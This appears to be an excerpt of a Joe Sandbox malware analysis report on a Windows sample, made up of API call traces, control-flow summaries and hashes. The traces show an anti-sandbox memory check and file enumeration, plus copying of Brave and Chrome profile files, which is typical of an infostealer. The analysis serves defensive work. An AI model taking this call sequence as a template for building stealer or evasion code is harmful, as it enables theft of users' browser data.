                                • Instruction Fuzzy Hash: F42110707201559BCB21FF7BD95579B37A4EF20305F00556BF84ADB352DA78E8008B98

                                Control-flow Graph

                                control_flow_graph 2886 4d10c0-4d10cb 2887 4d10d0-4d10dc 2886->2887 2889 4d10de-4d10f3 GlobalMemoryStatusEx 2887->2889 2890 4d10f5-4d1106 2889->2890 2891 4d1112-4d1114 ExitProcess 2889->2891 2892 4d1108 2890->2892 2893 4d111a-4d111d 2890->2893 2892->2891 2894 4d110a-4d1110 2892->2894 2894->2891 2894->2893
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: ExitGlobalMemoryProcessStatus
                                • String ID: @
                                • API String ID: 803317263-2766056989
                                • Opcode ID: 36753c84dbab4931d5720295d7c8ec9ea04ffffda9ed240e44f4d5a41d542dd5
                                • Instruction ID: e86933a9ef870031b3f2cf6255a6a7e8718038f0019bf9a1eb63664922c9561f
                                • Opcode Fuzzy Hash: 36753c84dbab4931d5720295d7c8ec9ea04ffffda9ed240e44f4d5a41d542dd5
                                • Instruction Fuzzy Hash: 2BF02E70104245A7E7107A64D92531EF7D8E705350F10852BDED6C27A2E638C880816F

                                Control-flow Graph

                                • Graph image: function 4e8c88, basic blocks 4e8c88 through 4e8eef; APIs referenced in the graph: StrCmpCA, ExitProcess, lstrlen, lstrcpy; subroutine calls to 4d2a20 and 4d2930.
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitProcess
                                • String ID: block
                                • API String ID: 621844428-2199623458
                                • Opcode ID: 8261b34522078203a8366949c7f46665b3e993cf086df5a6b46d0fb2ca96cf90
                                • Instruction ID: 841d6108cd2207435fa4d76e6c82831ed1acaea00e097f1d581a6f457579d0a2
                                • Opcode Fuzzy Hash: 8261b34522078203a8366949c7f46665b3e993cf086df5a6b46d0fb2ca96cf90
                                • Instruction Fuzzy Hash: BEE0D860100345EBDB249BB5CC94D57BBACBF84700700C52DB68A53291DF24AC00C75C

                                Control-flow Graph

                                • Graph image: function 4f2ad0, basic blocks 4f2ad0 through 4f2b59; APIs referenced in the graph: GetProcessHeap, RtlAllocateHeap, GetComputerNameA.
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 004F2AFF
                                • RtlAllocateHeap.NTDLL(00000000), ref: 004F2B06
                                • GetComputerNameA.KERNEL32(00000000,00000104), ref: 004F2B1A
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateComputerNameProcess
                                • String ID:
                                • API String ID: 1664310425-0
                                • Opcode ID: 01b1e101cdbc6f4c7a2599553800a2f780af285c66396a0ec79440abf4d7bcd2
                                • Instruction ID: c23917a118f5fe3d1472ba7e0c537537942821b99c033e1acfbc0e73048d08ab
                                • Opcode Fuzzy Hash: 01b1e101cdbc6f4c7a2599553800a2f780af285c66396a0ec79440abf4d7bcd2
                                • Instruction Fuzzy Hash: EC0126B2A40208EBD710CF98EC45BAEF7B8F704B21F00422AFE09D3780D778190087A5
                                APIs
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004E23D4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E23F7
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004E2402
                                • lstrlen.KERNEL32(\*.*), ref: 004E240D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E242A
                                • lstrcat.KERNEL32(00000000,\*.*), ref: 004E2436
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E246A
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 004E2486
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                • String ID: \*.*
                                • API String ID: 2567437900-1173974218
                                • Opcode ID: d871dc372d4ea8842c51d634d563bf8e4c3c6ba3f6da2ef014fb3d193f84b872
                                • Instruction ID: acf274eea710237208587bc9dbd05bcd7ea6e775a2bdf8a1472d5a2fe57ca3b1
                                • Opcode Fuzzy Hash: d871dc372d4ea8842c51d634d563bf8e4c3c6ba3f6da2ef014fb3d193f84b872
                                • Instruction Fuzzy Hash: 69A2B070A0025ADBCB21AF76CE98AAF77B8AF14305F04816AF94597351DFBCDD018B58
                                APIs
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004D16E2
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004D1719
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D176C
                                • lstrcat.KERNEL32(00000000), ref: 004D1776
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D17A2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D17EF
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004D17F9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D1825
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D1875
                                • lstrcat.KERNEL32(00000000), ref: 004D187F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D18AB
                                • lstrcpy.KERNEL32(00000000,?), ref: 004D18F3
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004D18FE
                                • lstrlen.KERNEL32(00501794), ref: 004D1909
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D1929
                                • lstrcat.KERNEL32(00000000,00501794), ref: 004D1935
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D195B
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004D1966
                                • lstrlen.KERNEL32(\*.*), ref: 004D1971
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D198E
                                • lstrcat.KERNEL32(00000000,\*.*), ref: 004D199A
                                  • Part of subcall function 004F4040: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 004F406D
                                  • Part of subcall function 004F4040: lstrcpy.KERNEL32(00000000,?), ref: 004F40A2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D19C3
                                • lstrcpy.KERNEL32(00000000,?), ref: 004D1A0E
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004D1A16
                                • lstrlen.KERNEL32(00501794), ref: 004D1A21
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D1A41
                                • lstrcat.KERNEL32(00000000,00501794), ref: 004D1A4D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D1A76
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004D1A81
                                • lstrlen.KERNEL32(00501794), ref: 004D1A8C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D1AAC
                                • lstrcat.KERNEL32(00000000,00501794), ref: 004D1AB8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D1ADE
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004D1AE9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D1B11
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 004D1B45
                                • StrCmpCA.SHLWAPI(?,005017A0), ref: 004D1B70
                                • StrCmpCA.SHLWAPI(?,005017A4), ref: 004D1B8A
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004D1BC4
                                • lstrcpy.KERNEL32(00000000,?), ref: 004D1BFB
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004D1C03
                                • lstrlen.KERNEL32(00501794), ref: 004D1C0E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D1C31
                                • lstrcat.KERNEL32(00000000,00501794), ref: 004D1C3D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D1C69
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004D1C74
                                • lstrlen.KERNEL32(00501794), ref: 004D1C7F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D1CA2
                                • lstrcat.KERNEL32(00000000,00501794), ref: 004D1CAE
                                • lstrlen.KERNEL32(?), ref: 004D1CBB
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D1CDB
                                • lstrcat.KERNEL32(00000000,?), ref: 004D1CE9
                                • lstrlen.KERNEL32(00501794), ref: 004D1CF4
                                • lstrcpy.KERNEL32(00000000,?), ref: 004D1D14
                                • lstrcat.KERNEL32(00000000,00501794), ref: 004D1D20
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D1D46
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004D1D51
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D1D7D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D1DE0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004D1DEB
                                • lstrlen.KERNEL32(00501794), ref: 004D1DF6
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D1E19
                                • lstrcat.KERNEL32(00000000,00501794), ref: 004D1E25
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D1E4B
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004D1E56
                                • lstrlen.KERNEL32(00501794), ref: 004D1E61
                                • lstrcpy.KERNEL32(00000000,?), ref: 004D1E81
                                • lstrcat.KERNEL32(00000000,00501794), ref: 004D1E8D
                                • lstrlen.KERNEL32(?), ref: 004D1E9A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D1EBA
                                • lstrcat.KERNEL32(00000000,?), ref: 004D1EC8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D1EF4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D1F3E
                                • GetFileAttributesA.KERNEL32(00000000), ref: 004D1F45
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004D1F9F
                                • lstrlen.KERNEL32(00CF9330), ref: 004D1FAE
                                • lstrcpy.KERNEL32(00000000,?), ref: 004D1FDB
                                • lstrcat.KERNEL32(00000000,?), ref: 004D1FE3
                                • lstrlen.KERNEL32(00501794), ref: 004D1FEE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D200E
                                • lstrcat.KERNEL32(00000000,00501794), ref: 004D201A
                                • lstrcpy.KERNEL32(00000000,?), ref: 004D2042
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004D204D
                                • lstrlen.KERNEL32(00501794), ref: 004D2058
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D2075
                                • lstrcat.KERNEL32(00000000,00501794), ref: 004D2081
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$File$AttributesFindFirstFolderPath
                                • String ID: \*.*
                                • API String ID: 4127656590-1173974218
                                • Opcode ID: f3f96a98cf3ac7225ece0d71610a316abab83a546825c1a2416bede431ad6e99
                                • Instruction ID: e5bb082375b4e13f09592f24d75418ff9ca21a36c1369cfb06bd31d6320e9a25
                                • Opcode Fuzzy Hash: f3f96a98cf3ac7225ece0d71610a316abab83a546825c1a2416bede431ad6e99
                                • Instruction Fuzzy Hash: 83928571A0121AEBCB21AF65DEA8AAF77B9AF10304F04415BF905A7361DB7CDD01CB58
                                APIs
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004DDBC1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DDBE4
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004DDBEF
                                • lstrlen.KERNEL32(00504CA8), ref: 004DDBFA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DDC17
                                • lstrcat.KERNEL32(00000000,00504CA8), ref: 004DDC23
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DDC4C
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004DDC8F
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004DDCBF
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 004DDCD0
                                • StrCmpCA.SHLWAPI(?,005017A0), ref: 004DDCF0
                                • StrCmpCA.SHLWAPI(?,005017A4), ref: 004DDD0A
                                • lstrlen.KERNEL32(004FCFEC), ref: 004DDD1D
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004DDD47
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DDD70
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004DDD7B
                                • lstrlen.KERNEL32(00501794), ref: 004DDD86
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DDDA3
                                • lstrcat.KERNEL32(00000000,00501794), ref: 004DDDAF
                                • lstrlen.KERNEL32(?), ref: 004DDDBC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DDDDF
                                • lstrcat.KERNEL32(00000000,?), ref: 004DDDED
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DDE19
                                • lstrlen.KERNEL32(00501794), ref: 004DDE3D
                                • lstrcpy.KERNEL32(00000000,?), ref: 004DDE6F
                                • lstrcat.KERNEL32(00000000,00501794), ref: 004DDE7B
                                • lstrlen.KERNEL32(00CF90E0), ref: 004DDE8A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DDEB0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004DDEBB
                                • lstrlen.KERNEL32(00501794), ref: 004DDEC6
                                • lstrcpy.KERNEL32(00000000,?), ref: 004DDEE6
                                • lstrcat.KERNEL32(00000000,00501794), ref: 004DDEF2
                                • lstrlen.KERNEL32(00CF9310), ref: 004DDF01
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DDF27
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004DDF32
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DDF5E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DDFA5
                                • lstrcat.KERNEL32(00000000,00501794), ref: 004DDFB1
                                • lstrlen.KERNEL32(00CF90E0), ref: 004DDFC0
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DDFE9
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004DDFF4
                                • lstrlen.KERNEL32(00501794), ref: 004DDFFF
                                • lstrcpy.KERNEL32(00000000,?), ref: 004DE022
                                • lstrcat.KERNEL32(00000000,00501794), ref: 004DE02E
                                • lstrlen.KERNEL32(00CF9310), ref: 004DE03D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DE063
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004DE06E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DE09A
                                • StrCmpCA.SHLWAPI(?,Brave), ref: 004DE0CD
                                • StrCmpCA.SHLWAPI(?,Preferences), ref: 004DE0E7
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004DE11F
                                • lstrlen.KERNEL32(00CFDEF0), ref: 004DE12E
                                • lstrcpy.KERNEL32(00000000,?), ref: 004DE155
                                • lstrcat.KERNEL32(00000000,?), ref: 004DE15D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DE19F
                                • lstrcat.KERNEL32(00000000), ref: 004DE1A9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DE1D0
                                • CopyFileA.KERNEL32(00000000,?,00000001), ref: 004DE1F9
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004DE22F
                                • lstrlen.KERNEL32(00CF9330), ref: 004DE23D
                                • lstrcpy.KERNEL32(00000000,?), ref: 004DE261
                                • lstrcat.KERNEL32(00000000,00CF9330), ref: 004DE269
                                • lstrlen.KERNEL32(\Brave\Preferences), ref: 004DE274
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DE29B
                                • lstrcat.KERNEL32(00000000,\Brave\Preferences), ref: 004DE2A7
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DE2CF
                                • lstrcpy.KERNEL32(00000000,?), ref: 004DE30F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DE349
                                • DeleteFileA.KERNEL32(?), ref: 004DE381
                                • StrCmpCA.SHLWAPI(?,00CFDEC0), ref: 004DE3AB
                                • lstrcpy.KERNEL32(00000000,?), ref: 004DE3F4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DE41C
                                • lstrcpy.KERNEL32(00000000,?), ref: 004DE445
                                • StrCmpCA.SHLWAPI(?,00CF9310), ref: 004DE468
                                • StrCmpCA.SHLWAPI(?,00CF90E0), ref: 004DE47D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DE4D9
                                • GetFileAttributesA.KERNEL32(00000000), ref: 004DE4E0
                                • StrCmpCA.SHLWAPI(?,00CFDF38), ref: 004DE58E
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004DE5C4
                                • CopyFileA.KERNEL32(00000000,?,00000001), ref: 004DE639
                                • lstrcpy.KERNEL32(00000000,?), ref: 004DE678
                                • lstrcpy.KERNEL32(00000000,?), ref: 004DE6A1
                                • lstrcpy.KERNEL32(00000000,?), ref: 004DE6C7
                                • lstrcpy.KERNEL32(00000000,?), ref: 004DE70E
                                • lstrcpy.KERNEL32(00000000,?), ref: 004DE737
                                • lstrcpy.KERNEL32(00000000,?), ref: 004DE75C
                                • StrCmpCA.SHLWAPI(?,Google Chrome), ref: 004DE776
                                • DeleteFileA.KERNEL32(?), ref: 004DE7D2
                                • StrCmpCA.SHLWAPI(?,00CF9380), ref: 004DE7FC
                                • lstrcpy.KERNEL32(00000000,?), ref: 004DE88C
                                • lstrcpy.KERNEL32(00000000,?), ref: 004DE8B5
                                • lstrcpy.KERNEL32(00000000,?), ref: 004DE8EE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DE916
                                • lstrcpy.KERNEL32(00000000,?), ref: 004DE952
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                 • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$File$CopyDelete$AttributesFindFirst
                                • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                • API String ID: 2635522530-726946144
                                • Opcode ID: 9546a1a01a2698b91ef59ded1a829644538cc213237aa9a22ce8452d2a1d29fb
                                • Instruction ID: f5115a26466d1c9098957159bfaa50e5e557c92eb54c1f065a8f666058f64766
                                • Opcode Fuzzy Hash: 9546a1a01a2698b91ef59ded1a829644538cc213237aa9a22ce8452d2a1d29fb
                                • Instruction Fuzzy Hash: A392BE71A0021ADBCB20AF75DDA9AAF77B9AF14304F04816BF90597351DB7CEC058B98
                                APIs
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004E18D2
                                • lstrlen.KERNEL32(\*.*), ref: 004E18DD
                                • lstrcpy.KERNEL32(00000000,?), ref: 004E18FF
                                • lstrcat.KERNEL32(00000000,\*.*), ref: 004E190B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E1932
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 004E1947
                                • StrCmpCA.SHLWAPI(?,005017A0), ref: 004E1967
                                • StrCmpCA.SHLWAPI(?,005017A4), ref: 004E1981
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004E19BF
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004E19F2
                                • lstrcpy.KERNEL32(00000000,?), ref: 004E1A1A
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004E1A25
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E1A4C
                                • lstrlen.KERNEL32(00501794), ref: 004E1A5E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E1A80
                                • lstrcat.KERNEL32(00000000,00501794), ref: 004E1A8C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E1AB4
                                • lstrlen.KERNEL32(?), ref: 004E1AC8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E1AE5
                                • lstrcat.KERNEL32(00000000,?), ref: 004E1AF3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E1B19
                                • lstrlen.KERNEL32(00CF9300), ref: 004E1B2F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E1B59
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004E1B64
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E1B8F
                                • lstrlen.KERNEL32(00501794), ref: 004E1BA1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E1BC3
                                • lstrcat.KERNEL32(00000000,00501794), ref: 004E1BCF
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E1BF8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E1C25
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004E1C30
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E1C57
                                • lstrlen.KERNEL32(00501794), ref: 004E1C69
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E1C8B
                                • lstrcat.KERNEL32(00000000,00501794), ref: 004E1C97
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E1CC0
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E1CEF
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004E1CFA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E1D21
                                • lstrlen.KERNEL32(00501794), ref: 004E1D33
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E1D55
                                • lstrcat.KERNEL32(00000000,00501794), ref: 004E1D61
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E1D8A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E1DB9
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004E1DC4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E1DED
                                • lstrlen.KERNEL32(00501794), ref: 004E1E19
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E1E36
                                • lstrcat.KERNEL32(00000000,00501794), ref: 004E1E42
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E1E68
                                • lstrlen.KERNEL32(00CFDFF8), ref: 004E1E7E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E1EB2
                                • lstrlen.KERNEL32(00501794), ref: 004E1EC6
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E1EE3
                                • lstrcat.KERNEL32(00000000,00501794), ref: 004E1EEF
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E1F15
                                • lstrlen.KERNEL32(00CFE780), ref: 004E1F2B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E1F5F
                                • lstrlen.KERNEL32(00501794), ref: 004E1F73
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E1F90
                                • lstrcat.KERNEL32(00000000,00501794), ref: 004E1F9C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E1FC2
                                • lstrlen.KERNEL32(00CEA480), ref: 004E1FD8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E2000
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004E200B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E2036
                                • lstrlen.KERNEL32(00501794), ref: 004E2048
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E2067
                                • lstrcat.KERNEL32(00000000,00501794), ref: 004E2073
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E2098
                                • lstrlen.KERNEL32(?), ref: 004E20AC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E20D0
                                • lstrcat.KERNEL32(00000000,?), ref: 004E20DE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E2103
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004E213F
                                • lstrlen.KERNEL32(00CFDEF0), ref: 004E214E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E2176
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004E2181
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                 • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$FileFindFirst
                                • String ID: \*.*
                                • API String ID: 712834838-1173974218
                                • Opcode ID: 017640484dd1c76673ea25fd26e707b3b6815ceecdb7a29eb3689f0a4518e161
                                • Instruction ID: cbabf6d0fd9f84eb93f4a2f4e60e5357a29f8eafb77a0c82b517f0c31721dbb2
                                • Opcode Fuzzy Hash: 017640484dd1c76673ea25fd26e707b3b6815ceecdb7a29eb3689f0a4518e161
                                • Instruction Fuzzy Hash: FC62C270A0165A9BCB21AF66CE58AAF77B9AF50305F04412BF90197361DF7CDD01CB98
                                APIs
                                • wsprintfA.USER32 ref: 004E392C
                                • FindFirstFileA.KERNEL32(?,?), ref: 004E3943
                                • StrCmpCA.SHLWAPI(?,005017A0), ref: 004E396C
                                • StrCmpCA.SHLWAPI(?,005017A4), ref: 004E3986
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004E39BF
                                • lstrcpy.KERNEL32(00000000,?), ref: 004E39E7
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004E39F2
                                • lstrlen.KERNEL32(00501794), ref: 004E39FD
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E3A1A
                                • lstrcat.KERNEL32(00000000,00501794), ref: 004E3A26
                                • lstrlen.KERNEL32(?), ref: 004E3A33
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E3A53
                                • lstrcat.KERNEL32(00000000,?), ref: 004E3A61
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E3A8A
